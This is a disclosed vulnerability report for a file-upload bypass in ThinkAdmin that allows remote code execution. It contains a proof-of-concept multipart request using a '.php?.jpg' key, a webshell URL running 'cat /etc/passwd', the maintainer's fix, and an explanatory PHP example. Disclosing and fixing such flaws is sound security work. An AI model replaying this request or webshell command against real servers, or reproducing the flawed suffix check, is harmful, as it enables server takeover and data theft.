Code Injection in zoujingli/thinkadmin

Status: Valid
Reported on Sep 15th 2021


Description

Remote code execution through the admin file-upload endpoint (/admin/api.upload/file.html). The handler resolved the file suffix from the whole `key` value, which ends in `.jpg`, but stored the file under the URL-path part of that value, which ends in `.php`. A PHP file can therefore be written into the public upload directory and executed by requesting it.

Proof of Concept

The request below is vulnerable to arbitrary system command execution.
The upload handler does not validate the uploaded file properly: the `key` field names the destination path, and a value ending in `.php?.jpg` passes the extension check (the string ends in `.jpg`) while the file is written to a path ending in `.php`. The uploaded PHP file is then executed when requested and runs system commands.

POST /admin/api.upload/file.html HTTP/2
Host: v6.thinkadmin.top
Cookie: lang=zh-cn; PHPSESSID=88a2945fb139bb74f87137d2144709ab; limit=20
Content-Length: 14171
Sec-Ch-Ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
Accept: text/plain, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAn0D7Qsi6kRX5BBr
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://v6.thinkadmin.top
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://v6.thinkadmin.top/admin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="key"

e4/949bdb5f9077bfed982ca9b7bfadbd.php?.jpg
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="safe"

0
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="uptype"

local
------WebKitFormBoundaryAn0D7Qsi6kRX5BBr
Content-Disposition: form-data; name="file"; filename="aaa.jpg"
Content-Type: image/jpeg

ÿØÿà   [these four characters are the JPEG magic bytes FF D8 FF E0 (SOI + APP0 marker) rendered as Latin-1; the rest of the 14171-byte body, including the PHP payload and the closing boundary, is not shown on the page]

POC

Open https://v6.thinkadmin.top//upload//e4//949bdb5f9077bfed982ca9b7bfadbd.php?id=cat%20/etc/passwd. The file was stored under the path part of `key` (upload/e4/949bdb5f9077bfed982ca9b7bfadbd.php) and is served as PHP, so the command passed in the `id` parameter is executed and the contents of /etc/passwd are returned in the response.

VIDEO

https://drive.google.com/file/d/1zlJHrL74emP3evk6bP9sZkSJ4xvBHOa9/view?usp=sharing

Impact

Remote code execution on the web server hosting ThinkAdmin: an uploaded PHP file is stored with a `.php` suffix under the public upload directory and executes arbitrary system commands when requested.

Timeline

We have contacted a member of the zoujingli/thinkadmin team and are waiting to hear back (a year ago)
邹景立 validated this vulnerability (a year ago)
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
邹景立 confirmed that a fix has been merged on 0bf173 (a year ago)
邹景立 has been awarded the fix bounty
邹景立 (Maintainer), a year ago:


Resolve file suffix:

pathinfo(parse_url($saveName, PHP_URL_PATH), PATHINFO_EXTENSION)
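The suffix check behind this report and the maintainer's fix, as an added PHP example (not ThinkAdmin's own code): it takes the `key` value from the request above and shows which suffix an extension check sees before and after the `parse_url` change. The pre-fix function is an assumed reconstruction of the bug class (suffix taken from the whole string); the allow-list and the extra test keys are assumed for illustration; only the post-fix expression is the one quoted in the maintainer's comment.

```php
<?php
// Added example, not ThinkAdmin's code. Models the bug in this report: the
// allow-list check saw the suffix of the whole "key" string, while the file
// was written under the URL-path part of that string.

declare(strict_types=1);

// Assumed allow-list for illustration.
const ALLOWED = ['jpg', 'jpeg', 'png', 'gif'];

// Assumed pre-fix behaviour: suffix taken from the full string, so anything
// after the last dot (here ".jpg" behind "?") is what gets checked.
function extensionBefore(string $saveName): string
{
    return strtolower(pathinfo($saveName, PATHINFO_EXTENSION));
}

// Post-fix behaviour (expression quoted by the maintainer): strip the query
// and fragment first, so the suffix checked is the one the file is actually
// stored and served with.
function extensionAfter(string $saveName): string
{
    $path = parse_url($saveName, PHP_URL_PATH);
    if (!is_string($path)) {        // parse_url gives null/false on odd input
        $path = '';
    }
    return strtolower(pathinfo($path, PATHINFO_EXTENSION));
}

function isAllowed(string $ext): bool
{
    return in_array($ext, ALLOWED, true);
}

// The key from the report, plus constructed variants of the same trick and one
// legitimate upload.
$keys = [
    'e4/949bdb5f9077bfed982ca9b7bfadbd.php?.jpg',   // from the report
    'e4/shell.php?x=.jpg',                           // constructed: query form
    'e4/shell.php#.jpg',                             // constructed: fragment form
    'e4/photo.jpg',                                  // constructed: benign
];

foreach ($keys as $key) {
    $before = extensionBefore($key);
    $after  = extensionAfter($key);
    printf("%-46s before: %-4s %-8s after: %-4s %s\n",
        $key,
        $before, isAllowed($before) ? 'allowed' : 'rejected',
        $after,  isAllowed($after)  ? 'allowed' : 'rejected');
}
```

Run with `php example.php`: the first three keys are allowed by the old check and rejected by the new one, and the plain `.jpg` key is allowed by both. The rule the fix applies is the general one: validate the exact name the file will be written and served under, not the raw user-supplied string. Two caveats a reviewer of the fix would add: an allow-list of image suffixes is safer than a deny-list of `php`, because depending on the web server's handler configuration other suffixes (for example `.phtml`) may also execute; and on an instance that was exposed before the fix, any file under the public upload directory whose on-disk name ends in `.php` should be treated as a likely webshell and investigated.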
